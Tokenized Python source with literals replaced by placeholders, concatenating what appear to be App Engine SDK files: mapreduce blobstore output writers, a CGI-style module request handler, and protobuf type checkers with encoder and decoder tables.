cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def create ( cls , mapreduce_state , shard_number ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> def finalize ( self , ctx , shard_number ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> _FILES_API_FLUSH_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _FILES_API_MAX_SIZE = <NUM_LIT:1000> * <NUM_LIT> <EOL> class _FilePool ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , flush_size_chars = _FILES_API_FLUSH_SIZE , ctx = None ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _append_buffer = { } <EOL> self . _size = <NUM_LIT:0> <EOL> self . _ctx = ctx <EOL> def __append ( self , filename , data ) : <EOL> """<STR_LIT>""" <EOL> self . _append_buffer [ filename ] = ( <EOL> self . _append_buffer . get ( filename , "<STR_LIT>" ) + data ) <EOL> self . _size += len ( data ) <EOL> def append ( self , filename , data ) : <EOL> """<STR_LIT>""" <EOL> if self . _size + len ( data ) > self . _flush_size : <EOL> self . flush ( ) <EOL> if len ( data ) > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . _flush_size ) <EOL> else : <EOL> self . __append ( filename , data ) <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> start_time = time . time ( ) <EOL> for filename , data in self . _append_buffer . iteritems ( ) : <EOL> with files . open ( filename , "<STR_LIT:a>" ) as f : <EOL> if len ( data ) > self . _flush_size : <EOL> raise "<STR_LIT>" + str ( len ( data ) ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( data ) ) ( self . _ctx ) <EOL> f . write ( data ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _append_buffer = { } <EOL> self . _size = <NUM_LIT:0> <EOL> class _StringWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _buffer = "<STR_LIT>" <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _buffer <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . _buffer += data <EOL> class RecordsPool ( object ) : <EOL> """<STR_LIT>""" <EOL> _RECORD_OVERHEAD_BYTES = <NUM_LIT:10> <EOL> def __init__ ( self , filename , <EOL> flush_size_chars = _FILES_API_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> self . _filename = filename <EOL> self . _ctx = ctx <EOL> self . _exclusive = exclusive <EOL> def append ( self , data ) : <EOL> """<STR_LIT>""" <EOL> data_length = len ( data ) <EOL> if self . _size + data_length > self . _flush_size : <EOL> self . flush ( ) <EOL> if not self . _exclusive and data_length > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" % ( data_length , _FILES_API_MAX_SIZE ) ) <EOL> else : <EOL> self . _buffer . append ( data ) <EOL> self . _size += data_length <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> buf = _StringWriter ( ) <EOL> with records . RecordsWriter ( buf ) as w : <EOL> for record in self . _buffer : <EOL> w . write ( record ) <EOL> str_buf = buf . to_string ( ) <EOL> if not self . _exclusive and len ( str_buf ) > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( _FILES_API_MAX_SIZE , len ( str_buf ) ) ) <EOL> start_time = time . time ( ) <EOL> with files . open ( self . _filename , "<STR_LIT:a>" , exclusive_lock = self . _exclusive ) as f : <EOL> f . write ( str_buf ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( str_buf ) ) ( self . _ctx ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> gc . collect ( ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . flush ( ) <EOL> def _get_output_sharding ( <EOL> mapreduce_state = None , <EOL> mapper_spec = None ) : <EOL> """<STR_LIT>""" <EOL> if mapper_spec : <EOL> return string . lower ( mapper_spec . params . get ( <EOL> BlobstoreOutputWriterBase . OUTPUT_SHARDING_PARAM , <EOL> BlobstoreOutputWriterBase . OUTPUT_SHARDING_NONE ) ) <EOL> if mapreduce_state : <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> return _get_output_sharding ( mapper_spec = mapper_spec ) <EOL> raise errors . Error ( "<STR_LIT>" ) <EOL> class BlobstoreOutputWriterBase ( OutputWriter ) : <EOL> """<STR_LIT>""" <EOL> OUTPUT_SHARDING_PARAM = "<STR_LIT>" <EOL> OUTPUT_SHARDING_NONE = "<STR_LIT:none>" <EOL> OUTPUT_SHARDING_INPUT_SHARDS = "<STR_LIT:input>" <EOL> class _State ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filenames ) : <EOL> self . filenames = filenames <EOL> def to_json ( self ) : <EOL> return { "<STR_LIT>" : self . filenames } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return cls ( json [ "<STR_LIT>" ] ) <EOL> def __init__ ( self , filename ) : <EOL> self . _filename = filename <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> if mapper_spec . output_writer_class ( ) != cls : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" ) <EOL> output_sharding = _get_output_sharding ( mapper_spec = mapper_spec ) <EOL> if ( output_sharding != cls . OUTPUT_SHARDING_NONE and <EOL> output_sharding != cls . OUTPUT_SHARDING_INPUT_SHARDS ) : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % output_sharding ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> mime_type = mapper_spec . params . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> number_of_files = <NUM_LIT:1> <EOL> if output_sharding == cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> number_of_files = mapper_spec . shard_count <EOL> filenames = [ ] <EOL> for i in range ( number_of_files ) : <EOL> blob_file_name = ( mapreduce_state . mapreduce_spec . name + <EOL> "<STR_LIT:->" + mapreduce_state . mapreduce_spec . mapreduce_id + <EOL> "<STR_LIT>" ) <EOL> if number_of_files > <NUM_LIT:1> : <EOL> blob_file_name += "<STR_LIT:->" + str ( i ) <EOL> filenames . append ( files . blobstore . create ( <EOL> mime_type = mime_type , <EOL> _blobinfo_uploaded_filename = blob_file_name ) ) <EOL> mapreduce_state . writer_state = cls . _State ( filenames ) . to_json ( ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> finalized_filenames = [ ] <EOL> for filename in state . filenames : <EOL> if output_sharding != cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> files . finalize ( filename ) <EOL> finalized_filenames . append ( <EOL> files . blobstore . get_file_name ( <EOL> files . blobstore . get_blob_key ( filename ) ) ) <EOL> state . filenames = finalized_filenames <EOL> mapreduce_state . writer_state = state . to_json ( ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> return cls ( state [ "<STR_LIT:filename>" ] ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { "<STR_LIT:filename>" : self . _filename } <EOL> @ classmethod <EOL> def create ( cls , mapreduce_state , shard_number ) : <EOL> """<STR_LIT>""" <EOL> file_index = <NUM_LIT:0> <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> if output_sharding == cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> file_index = shard_number <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> return cls ( state . filenames [ file_index ] ) <EOL> def finalize ( self , ctx , shard_number ) : <EOL> """<STR_LIT>""" <EOL> mapreduce_spec = ctx . mapreduce_spec <EOL> output_sharding = _get_output_sharding ( mapper_spec = mapreduce_spec . mapper ) <EOL> if output_sharding == self . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> files . finalize ( self . _filename ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> return state . filenames <EOL> class BlobstoreOutputWriter ( BlobstoreOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> if ctx . get_pool ( "<STR_LIT>" ) is None : <EOL> ctx . register_pool ( "<STR_LIT>" , _FilePool ( ctx = ctx ) ) <EOL> ctx . get_pool ( "<STR_LIT>" ) . append ( self . _filename , str ( data ) ) <EOL> class BlobstoreRecordsOutputWriter ( BlobstoreOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . OUTPUT_SHARDING_PARAM in mapper_spec . params : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % cls . __name__ ) <EOL> mapper_spec . params [ cls . OUTPUT_SHARDING_PARAM ] = ( <EOL> cls . OUTPUT_SHARDING_INPUT_SHARDS ) <EOL> super ( BlobstoreRecordsOutputWriter , cls ) . validate ( mapper_spec ) <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> if ctx . get_pool ( "<STR_LIT>" ) is None : <EOL> ctx . register_pool ( "<STR_LIT>" , <EOL> RecordsPool ( self . _filename , ctx = ctx , exclusive = True ) ) <EOL> ctx . get_pool ( "<STR_LIT>" ) . append ( str ( data ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import cStringIO <EOL> from email import feedparser <EOL> import imp <EOL> import logging <EOL> import marshal <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import types <EOL> def HandleRequest ( unused_environ , handler_name , unused_url , post_data , <EOL> unused_error , application_root , python_lib , <EOL> import_hook = None ) : <EOL> """<STR_LIT>""" <EOL> body = cStringIO . StringIO ( ) <EOL> module_name = _FileToModuleName ( handler_name ) <EOL> parent_module , _ , submodule_name = module_name . rpartition ( '<STR_LIT:.>' ) <EOL> parent_module = _GetModuleOrNone ( parent_module ) <EOL> main = None <EOL> if module_name in sys . modules : <EOL> module = sys . modules [ module_name ] <EOL> main = _GetValidMain ( module ) <EOL> if not main : <EOL> module = imp . new_module ( '<STR_LIT:__main__>' ) <EOL> if import_hook is not None : <EOL> module . __loader__ = import_hook <EOL> saved_streams = sys . stdin , sys . stdout <EOL> try : <EOL> sys . modules [ '<STR_LIT:__main__>' ] = module <EOL> module . __dict__ [ '<STR_LIT>' ] = '<STR_LIT:__main__>' <EOL> sys . stdin = post_data <EOL> sys . stdout = body <EOL> if main : <EOL> os . environ [ '<STR_LIT>' ] = module . __file__ <EOL> main ( ) <EOL> else : <EOL> filename = _AbsolutePath ( handler_name , application_root , python_lib ) <EOL> if filename . endswith ( os . sep + '<STR_LIT>' ) : <EOL> module . __path__ = [ os . path . dirname ( filename ) ] <EOL> if import_hook is None : <EOL> code , filename = _LoadModuleCode ( filename ) <EOL> else : <EOL> code = import_hook . get_code ( module_name ) <EOL> if not code : <EOL> return { '<STR_LIT:error>' : <NUM_LIT:2> } <EOL> os . environ [ '<STR_LIT>' ] = filename <EOL> module . __file__ = filename <EOL> try : <EOL> sys . modules [ module_name ] = module <EOL> eval ( code , module . __dict__ ) <EOL> except : <EOL> del sys . modules [ module_name ] <EOL> if parent_module and submodule_name in parent_module . __dict__ : <EOL> del parent_module . __dict__ [ submodule_name ] <EOL> raise <EOL> else : <EOL> if parent_module : <EOL> parent_module . __dict__ [ submodule_name ] = module <EOL> return _ParseResponse ( body . getvalue ( ) ) <EOL> except : <EOL> exception = sys . exc_info ( ) <EOL> message = '<STR_LIT>' . join ( traceback . format_exception ( exception [ <NUM_LIT:0> ] , exception [ <NUM_LIT:1> ] , <EOL> exception [ <NUM_LIT:2> ] . tb_next ) ) <EOL> logging . error ( message ) <EOL> return { '<STR_LIT:error>' : <NUM_LIT:1> } <EOL> finally : <EOL> sys . stdin , sys . stdout = saved_streams <EOL> module . __name__ = module_name <EOL> if '<STR_LIT:__main__>' in sys . modules : <EOL> del sys . modules [ '<STR_LIT:__main__>' ] <EOL> def _ParseResponse ( response ) : <EOL> """<STR_LIT>""" <EOL> parser = feedparser . FeedParser ( ) <EOL> parser . _set_headersonly ( ) <EOL> parser . feed ( response ) <EOL> parsed_response = parser . close ( ) <EOL> if '<STR_LIT>' in parsed_response : <EOL> status = int ( parsed_response [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] ) <EOL> del parsed_response [ '<STR_LIT>' ] <EOL> else : <EOL> status = <NUM_LIT:200> <EOL> return { '<STR_LIT:body>' : parsed_response . get_payload ( ) , <EOL> '<STR_LIT>' : parsed_response . items ( ) , <EOL> '<STR_LIT>' : status } <EOL> def _ParseHeader ( header ) : <EOL> """<STR_LIT>""" <EOL> key , _ , value = header . partition ( '<STR_LIT::>' ) <EOL> return key . strip ( ) , value . strip ( ) <EOL> def _GetValidMain ( module ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( module , '<STR_LIT>' ) : <EOL> return None <EOL> main = module . main <EOL> if not hasattr ( main , '<STR_LIT>' ) : <EOL> return None <EOL> defaults = main . __defaults__ <EOL> if defaults : <EOL> default_argcount = len ( defaults ) <EOL> else : <EOL> default_argcount = <NUM_LIT:0> <EOL> if ( main . __code__ . co_argcount - default_argcount ) == <NUM_LIT:0> : <EOL> return main <EOL> else : <EOL> return None <EOL> def _FileToModuleName ( filename ) : <EOL> """<STR_LIT>""" <EOL> _ , lib , suffix = filename . partition ( '<STR_LIT>' ) <EOL> if lib : <EOL> module = suffix <EOL> else : <EOL> module = filename <EOL> module = os . path . normpath ( module ) <EOL> if '<STR_LIT>' in module : <EOL> module = module . rpartition ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> module = module . replace ( os . sep , '<STR_LIT:.>' ) <EOL> module = module . strip ( '<STR_LIT:.>' ) <EOL> if module . endswith ( '<STR_LIT>' ) : <EOL> module = module . rpartition ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return module <EOL> def _AbsolutePath ( filename , application_root , python_lib ) : <EOL> """<STR_LIT>""" <EOL> _ , lib , suffix = filename . partition ( '<STR_LIT>' ) <EOL> if lib : <EOL> filename = os . path . join ( python_lib , suffix ) <EOL> else : <EOL> filename = os . path . join ( application_root , filename ) <EOL> if filename . endswith ( os . sep ) or os . path . isdir ( filename ) : <EOL> filename = os . path . join ( filename , '<STR_LIT>' ) <EOL> return filename <EOL> def _LoadModuleCode ( filename ) : <EOL> """<STR_LIT>""" <EOL> compiled_filename = filename + '<STR_LIT:c>' <EOL> if os . path . exists ( compiled_filename ) : <EOL> with open ( compiled_filename , '<STR_LIT:r>' ) as f : <EOL> magic_numbers = f . read ( <NUM_LIT:8> ) <EOL> if len ( magic_numbers ) == <NUM_LIT:8> and magic_numbers [ : <NUM_LIT:4> ] == imp . get_magic ( ) : <EOL> try : <EOL> return _FixCodeFilename ( marshal . load ( f ) , filename ) , compiled_filename <EOL> except ( EOFError , ValueError ) : <EOL> pass <EOL> if os . path . exists ( filename ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> code = compile ( f . read ( ) , filename , '<STR_LIT>' , <NUM_LIT:0> , True ) <EOL> return code , filename <EOL> else : <EOL> return None , filename <EOL> def _FixCodeFilename ( code , filename ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( code , types . CodeType ) : <EOL> code = types . CodeType ( <EOL> code . co_argcount , <EOL> code . co_nlocals , <EOL> code . co_stacksize , <EOL> code . co_flags , <EOL> code . co_code , <EOL> tuple ( [ _FixCodeFilename ( c , filename ) for c in code . co_consts ] ) , <EOL> code . co_names , <EOL> code . co_varnames , <EOL> filename , <EOL> code . co_name , <EOL> code . co_firstlineno , <EOL> code . co_lnotab , <EOL> code . co_freevars , <EOL> code . co_cellvars ) <EOL> return code <EOL> def _GetModuleOrNone ( module_name ) : <EOL> """<STR_LIT>""" <EOL> module = None <EOL> if module_name : <EOL> try : <EOL> module = __import__ ( module_name ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> for name in module_name . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] : <EOL> module = getattr ( module , name ) <EOL> return module </s>
<s> """<STR_LIT>""" <EOL> from google . net . proto2 . python . internal import decoder <EOL> from google . net . proto2 . python . internal import encoder <EOL> from google . net . proto2 . python . internal import wire_format <EOL> from google . net . proto2 . python . public import descriptor <EOL> _FieldDescriptor = descriptor . FieldDescriptor <EOL> def GetTypeChecker ( cpp_type , field_type ) : <EOL> """<STR_LIT>""" <EOL> if ( cpp_type == _FieldDescriptor . CPPTYPE_STRING and <EOL> field_type == _FieldDescriptor . TYPE_STRING ) : <EOL> return UnicodeValueChecker ( ) <EOL> return _VALUE_CHECKERS [ cpp_type ] <EOL> class TypeChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * acceptable_types ) : <EOL> self . _acceptable_types = acceptable_types <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , self . _acceptable_types ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , self . _acceptable_types ) ) <EOL> raise TypeError ( message ) <EOL> class IntValueChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , ( int , long ) ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , ( int , long ) ) ) <EOL> raise TypeError ( message ) <EOL> if not self . _MIN <= proposed_value <= self . _MAX : <EOL> raise ValueError ( '<STR_LIT>' % proposed_value ) <EOL> class UnicodeValueChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , ( str , unicode ) ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , ( str , unicode ) ) ) <EOL> raise TypeError ( message ) <EOL> if isinstance ( proposed_value , str ) : <EOL> try : <EOL> unicode ( proposed_value , '<STR_LIT:ascii>' ) <EOL> except UnicodeDecodeError : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( proposed_value ) ) <EOL> class Int32ValueChecker ( IntValueChecker ) : <EOL> _MIN = - <NUM_LIT> <EOL> _MAX = <NUM_LIT> <EOL> class Uint32ValueChecker ( IntValueChecker ) : <EOL> _MIN = <NUM_LIT:0> <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT:32> ) - <NUM_LIT:1> <EOL> class Int64ValueChecker ( IntValueChecker ) : <EOL> _MIN = - ( <NUM_LIT:1> << <NUM_LIT> ) <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT> ) - <NUM_LIT:1> <EOL> class Uint64ValueChecker ( IntValueChecker ) : <EOL> _MIN = <NUM_LIT:0> <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT:64> ) - <NUM_LIT:1> <EOL> _VALUE_CHECKERS = { <EOL> _FieldDescriptor . CPPTYPE_INT32 : Int32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_INT64 : Int64ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_UINT32 : Uint32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_UINT64 : Uint64ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_DOUBLE : TypeChecker ( <EOL> float , int , long ) , <EOL> _FieldDescriptor . CPPTYPE_FLOAT : TypeChecker ( <EOL> float , int , long ) , <EOL> _FieldDescriptor . CPPTYPE_BOOL : TypeChecker ( bool , int ) , <EOL> _FieldDescriptor . CPPTYPE_ENUM : Int32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_STRING : TypeChecker ( str ) , <EOL> } <EOL> TYPE_TO_BYTE_SIZE_FN = { <EOL> _FieldDescriptor . TYPE_DOUBLE : wire_format . DoubleByteSize , <EOL> _FieldDescriptor . TYPE_FLOAT : wire_format . FloatByteSize , <EOL> _FieldDescriptor . TYPE_INT64 : wire_format . Int64ByteSize , <EOL> _FieldDescriptor . TYPE_UINT64 : wire_format . UInt64ByteSize , <EOL> _FieldDescriptor . TYPE_INT32 : wire_format . Int32ByteSize , <EOL> _FieldDescriptor . TYPE_FIXED64 : wire_format . Fixed64ByteSize , <EOL> _FieldDescriptor . TYPE_FIXED32 : wire_format . Fixed32ByteSize , <EOL> _FieldDescriptor . TYPE_BOOL : wire_format . BoolByteSize , <EOL> _FieldDescriptor . TYPE_STRING : wire_format . StringByteSize , <EOL> _FieldDescriptor . TYPE_GROUP : wire_format . GroupByteSize , <EOL> _FieldDescriptor . TYPE_MESSAGE : wire_format . MessageByteSize , <EOL> _FieldDescriptor . TYPE_BYTES : wire_format . BytesByteSize , <EOL> _FieldDescriptor . TYPE_UINT32 : wire_format . UInt32ByteSize , <EOL> _FieldDescriptor . TYPE_ENUM : wire_format . EnumByteSize , <EOL> _FieldDescriptor . TYPE_SFIXED32 : wire_format . SFixed32ByteSize , <EOL> _FieldDescriptor . TYPE_SFIXED64 : wire_format . SFixed64ByteSize , <EOL> _FieldDescriptor . TYPE_SINT32 : wire_format . SInt32ByteSize , <EOL> _FieldDescriptor . TYPE_SINT64 : wire_format . SInt64ByteSize <EOL> } <EOL> TYPE_TO_ENCODER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : encoder . DoubleEncoder , <EOL> _FieldDescriptor . TYPE_FLOAT : encoder . FloatEncoder , <EOL> _FieldDescriptor . TYPE_INT64 : encoder . Int64Encoder , <EOL> _FieldDescriptor . TYPE_UINT64 : encoder . UInt64Encoder , <EOL> _FieldDescriptor . TYPE_INT32 : encoder . Int32Encoder , <EOL> _FieldDescriptor . TYPE_FIXED64 : encoder . Fixed64Encoder , <EOL> _FieldDescriptor . TYPE_FIXED32 : encoder . Fixed32Encoder , <EOL> _FieldDescriptor . TYPE_BOOL : encoder . BoolEncoder , <EOL> _FieldDescriptor . TYPE_STRING : encoder . StringEncoder , <EOL> _FieldDescriptor . TYPE_GROUP : encoder . GroupEncoder , <EOL> _FieldDescriptor . TYPE_MESSAGE : encoder . MessageEncoder , <EOL> _FieldDescriptor . TYPE_BYTES : encoder . BytesEncoder , <EOL> _FieldDescriptor . TYPE_UINT32 : encoder . UInt32Encoder , <EOL> _FieldDescriptor . TYPE_ENUM : encoder . EnumEncoder , <EOL> _FieldDescriptor . TYPE_SFIXED32 : encoder . SFixed32Encoder , <EOL> _FieldDescriptor . TYPE_SFIXED64 : encoder . SFixed64Encoder , <EOL> _FieldDescriptor . TYPE_SINT32 : encoder . SInt32Encoder , <EOL> _FieldDescriptor . TYPE_SINT64 : encoder . SInt64Encoder , <EOL> } <EOL> TYPE_TO_SIZER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : encoder . DoubleSizer , <EOL> _FieldDescriptor . TYPE_FLOAT : encoder . FloatSizer , <EOL> _FieldDescriptor . TYPE_INT64 : encoder . Int64Sizer , <EOL> _FieldDescriptor . TYPE_UINT64 : encoder . UInt64Sizer , <EOL> _FieldDescriptor . TYPE_INT32 : encoder . Int32Sizer , <EOL> _FieldDescriptor . TYPE_FIXED64 : encoder . Fixed64Sizer , <EOL> _FieldDescriptor . TYPE_FIXED32 : encoder . Fixed32Sizer , <EOL> _FieldDescriptor . TYPE_BOOL : encoder . BoolSizer , <EOL> _FieldDescriptor . TYPE_STRING : encoder . StringSizer , <EOL> _FieldDescriptor . TYPE_GROUP : encoder . GroupSizer , <EOL> _FieldDescriptor . TYPE_MESSAGE : encoder . MessageSizer , <EOL> _FieldDescriptor . TYPE_BYTES : encoder . BytesSizer , <EOL> _FieldDescriptor . TYPE_UINT32 : encoder . UInt32Sizer , <EOL> _FieldDescriptor . TYPE_ENUM : encoder . EnumSizer , <EOL> _FieldDescriptor . TYPE_SFIXED32 : encoder . SFixed32Sizer , <EOL> _FieldDescriptor . TYPE_SFIXED64 : encoder . SFixed64Sizer , <EOL> _FieldDescriptor . TYPE_SINT32 : encoder . SInt32Sizer , <EOL> _FieldDescriptor . TYPE_SINT64 : encoder . SInt64Sizer , <EOL> } <EOL> TYPE_TO_DECODER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : decoder . DoubleDecoder , <EOL> _FieldDescriptor . TYPE_FLOAT : decoder . FloatDecoder , <EOL> _FieldDescriptor . TYPE_INT64 : decoder . Int64Decoder , <EOL> _FieldDescriptor . TYPE_UINT64 : decoder . UInt64Decoder , <EOL> _FieldDescriptor . TYPE_INT32 : decoder . Int32Decoder , <EOL> _FieldDescriptor . TYPE_FIXED64 : decoder . Fixed64Decoder , <EOL> _FieldDescriptor . TYPE_FIXED32 : decoder . Fixed32Decoder , <EOL> _FieldDescriptor . TYPE_BOOL : decoder . BoolDecoder , <EOL> _FieldDescriptor . TYPE_STRING : decoder . StringDecoder , <EOL> _FieldDescriptor . TYPE_GROUP : decoder . GroupDecoder , <EOL> _FieldDescriptor . TYPE_MESSAGE : decoder . MessageDecoder , <EOL> _FieldDescriptor . TYPE_BYTES : decoder . BytesDecoder , <EOL> _FieldDescriptor . TYPE_UINT32 : decoder . UInt32Decoder , <EOL> _FieldDescriptor . TYPE_ENUM : decoder . EnumDecoder , <EOL> _FieldDescriptor . TYPE_SFIXED32 : decoder . SFixed32Decoder , <EOL> _FieldDescriptor . TYPE_SFIXED64 : decoder . SFixed64Decoder , <EOL> _FieldDescriptor . TYPE_SINT32 : decoder . SInt32Decoder , <EOL> _FieldDescriptor . TYPE_SINT64 : decoder . SInt64Decoder , <EOL> } <EOL> FIELD_TYPE_TO_WIRE_TYPE = { <EOL> _FieldDescriptor . TYPE_DOUBLE : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . TYPE_FLOAT : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_INT64 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_UINT64 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_INT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_FIXED64 : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . TYPE_FIXED32 : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_BOOL : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_STRING : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_GROUP : wire_format . WIRETYPE_START_GROUP , <EOL> _FieldDescriptor . TYPE_MESSAGE : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_BYTES : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_UINT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_ENUM : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_SFIXED32 : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_SFIXED64 : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . TYPE_SINT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_SINT64 : wire_format . WIRETYPE_VARINT , 